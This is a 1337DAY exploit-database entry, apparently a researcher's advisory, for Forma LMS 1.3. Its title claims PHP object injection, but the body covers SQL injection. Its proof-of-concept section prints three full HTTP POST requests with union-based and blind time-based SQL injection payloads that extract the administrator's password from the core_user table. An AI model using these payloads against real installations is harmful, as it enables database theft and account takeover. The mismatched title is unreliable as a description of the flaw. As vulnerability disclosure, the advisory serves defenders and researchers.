Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities

ID 1337DAY-ID-23641
Type zdt
Reporter Filippo Roncari
Modified 2015-05-18T00:00:00


Exploit for php platform in category web applications

                                            Forma LMS 1.3 Multiple SQL Injections

[+] Author: Filippo Roncari
[+] Target: Forma LMS 
[+] Version: 1.3 and probably lower
[+] Vendor:
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory:
[+] Info: /

[+] Summary
Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more.

[+] Vulnerability Details
Forma LMS 1.3 is prone to multiple SQL injections vulnerabilities, which allow unprivileged users to inject arbitrary SQL statements.
An attacker could exploit these vulnerabilities by sending crafted requests to the web application. These issues can lead to data theft, data disruption, account violation and other attacks depending on the DBMS’s user privileges.

[+] Technical Details
See full advisory at for technical details and source code.

[+] Proof of Concept (PoC)
Unprivileged users such as Student or Professors could exploit these issues.
In reported payload "idst" SQL param is equal to 11836 which was admin's ID in tested installation.

	[!] coursereport.php SQL Injection in title param
	POST /formalms/appLms/index.php?modname=coursereport&op=addscorm HTTP/1.1 Host: localhost
	Cookie: docebo_session=a6c94fcdfecf0d08b83de03a3c576885

	authentic_request=e1d3c5667856f21f0d09ce4796a76da6&id_report=0&source_of=scoitem&title=null+union+select+pass+fr om+core_user+where+idst=11836+&filtra=Salva+modifiche

	[!] lib.message.php Blind Time-Based SQL Injection in msg_course_filter param
	POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1 Host: localhost
	Cookie: docebo_session=0c0491bb1fa6d814752d9e59c066df60


	Content-Disposition: form-data; name="msg_course_filter"

	99999 union SELECT IF(SUBSTRING(pass,1,1) = char(100),benchmark(5000000,encode(1,2)),null) from core_user
	where idst=11836


	[!] coursereport.php SQL Injection in id_source param
	POST /formalms/appLms/index.php?modname=coursereport&op=addscorm HTTP/1.1
	Host: localhost
	Cookie: docebo_session=a6c94fcdfecf0d08b83de03a3c576885; SQLiteManager_currentLangue=2

	authentic_request=e1d3c5667856f21f0d09ce4796a76da6&id_report=0&weight=123&show_to_user=true&use_for_final=true&tit le=&source_of=scoitem&titolo=&id_source=null+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,p ass,null,null,null+from+core_user+where+idst=11836&save=Salva+modifiche

For further details and explanations check the full advisory.

[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.

# [2016-04-19]  #